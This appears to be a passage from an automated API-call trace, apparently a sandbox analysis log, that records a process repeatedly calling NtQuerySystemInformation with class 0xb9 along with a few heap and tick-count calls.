NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x38, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d730, Length=0x20, ResultLength=0x0) [0233.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6c0, Length=0x20, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6c0, Length=0x20, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x58, ResultLength=0x0) [0233.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x38, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6e0, Length=0x28, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6e0, Length=0x28, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6e0, Length=0x28, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6e0, Length=0x28, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d750, Length=0x28, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x38, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7d0, Length=0x28, ResultLength=0x0) [0233.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7d0, Length=0x28, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x38, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d730, Length=0x20, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x20, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x20, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x20, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x38, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d730, Length=0x20, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6c0, Length=0x20, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6c0, Length=0x20, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x58, ResultLength=0x0) [0233.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x38, ResultLength=0x0) [0233.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x28, ResultLength=0x0) [0233.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x28, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x28, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6b0, Length=0x28, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d720, Length=0x28, ResultLength=0x0) [0233.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x38, ResultLength=0x0) [0233.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x38, ResultLength=0x0) [0233.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7a0, Length=0x28, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7a0, Length=0x28, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x38, ResultLength=0x0) [0233.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x38, ResultLength=0x0) [0233.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d610, Length=0x20, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d590, Length=0x20, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d590, Length=0x20, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d590, Length=0x20, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x20, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x38, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d700, Length=0x20, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d680, Length=0x20, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d680, Length=0x20, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d680, Length=0x20, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x38, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d700, Length=0x20, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d680, Length=0x20, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d680, Length=0x20, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d680, Length=0x20, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x38, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d700, Length=0x20, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d690, Length=0x20, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d690, Length=0x20, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc10, Length=0x20, ResultLength=0x0) [0233.635] GetTickCount () returned 0x117af0f [0233.635] GetProcessHeap () returned 0x2026c630000 [0233.635] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d4208a0 [0233.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db30, Length=0x28, ResultLength=0x0) [0233.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db30, Length=0x28, ResultLength=0x0) [0233.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x58, ResultLength=0x0) [0233.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d900, Length=0x38, ResultLength=0x0) [0233.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d740, Length=0x28, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d740, Length=0x28, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d740, Length=0x28, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d740, Length=0x28, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7b0, Length=0x28, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d900, Length=0x38, ResultLength=0x0) [0233.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d900, Length=0x38, ResultLength=0x0) [0233.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d830, Length=0x28, ResultLength=0x0) [0233.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d830, Length=0x28, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d900, Length=0x38, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d900, Length=0x38, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6a0, Length=0x20, ResultLength=0x0) [0233.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d620, Length=0x20, ResultLength=0x0) [0233.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d620, Length=0x20, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d620, Length=0x20, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d900, Length=0x38, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d790, Length=0x20, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d710, Length=0x20, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d710, Length=0x20, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d710, Length=0x20, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d900, Length=0x38, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d790, Length=0x20, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d710, Length=0x20, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d710, Length=0x20, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d710, Length=0x20, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d900, Length=0x38, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d790, Length=0x20, ResultLength=0x0) 